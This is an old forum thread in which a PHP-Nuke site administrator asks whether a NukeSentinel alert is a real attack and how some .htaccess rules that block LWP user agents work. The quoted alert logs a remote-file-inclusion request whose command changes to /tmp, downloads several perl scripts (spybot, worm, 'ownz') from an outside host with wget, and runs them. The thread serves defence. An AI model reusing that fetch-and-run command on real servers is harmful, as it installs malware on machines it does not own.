Is this a real hacking attempt or not?

Worker Joined: Aug 02, 2004 Posts: 165

Is the below nukesentinel alert (v2.1.2) a "real attack" or a "false alarm"? Should I block (ban) those attemts.

Quote:

Date & Time: 2004-12-26 05:10:34
Blocked IP: 123.123.123.123
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: LWP::Simple/5.803
Query String: www.removed_site_name.net/modules.php?name=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt
Forwarded For: none
Client IP: none
Remote Address: 123.123.123.123
Remote Port: 60101
Request Method: GET

Client Joined: Apr 10, 2004 Posts: 649 Location: UK

Yes it is

Check out the thread Holy Mackerel, it explains it all in there.

We're all getting hit by it.

Thank goodness for Sentinel

Posted: Sun Dec 26, 2004 6:00 am

Thanx, so I should add following text to my .htaccess? Does it block all LWP client www-requests or what it does?

Code:

Quote:


RewriteEngine on


#The next lines check for Spammers Robots and redirect them to a fake page


RewriteCond %{HTTP_USER_AGENT} ^LWP [NC]


RewriteRule ^.*$ emailsforyou.php [L]


RewriteEngine Off

Could somebody explain me what those lines means (e.g. rewrite engine on/off).

Code:

RewriteRule ^.*$ emailsforyou.php [L]

What this line do? Should I have emailsforyou.php page somewhere e.g.:

Code:

RewriteRule ^.*$ http://www.sitename.com/blokked.php [L]